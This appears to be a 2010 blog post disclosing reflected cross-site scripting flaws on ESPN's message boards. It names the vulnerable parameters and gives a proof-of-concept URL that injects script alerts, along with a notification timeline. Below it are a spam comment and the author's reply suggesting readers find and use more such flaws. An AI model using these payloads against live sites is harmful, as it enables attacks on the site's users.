+++About ESPN Global+++
http://espn.go.com
+++Affected URL(s)+++
http://boards.espn.go.com
+++Vulnerable Parameter / Function+++
sport
id
nav
http://espn.go.com
+++Affected URL(s)+++
http://boards.espn.go.com
+++Vulnerable Parameter / Function+++
sport
id
nav
+++PoC+++
http://boards.espn.go.com/boards/mb/mb?sport=espn'><script>alert('XSS from sport')</script>&id=index'><script>alert('XSS from id')</script>
ESPN Global Ist Notified: January 2010
IInd Notification: September 06, 2010
Response Received: None
Current Status: Vulnerable (As of today, September 12, 2010)
Best Regards.
Wonderful blog! I found it while searching on Yahoo News. Do you have any tips on how to get listed in Yahoo News? I’ve been trying for a while but I never seem to get there! Many thanks.sbobet
ReplyDeleteHey there, Thanks for your comments.
ReplyDeleteI dunno what you're asking about. But there are a few XSS in there too. If you can find them, you may be able to use them.
KG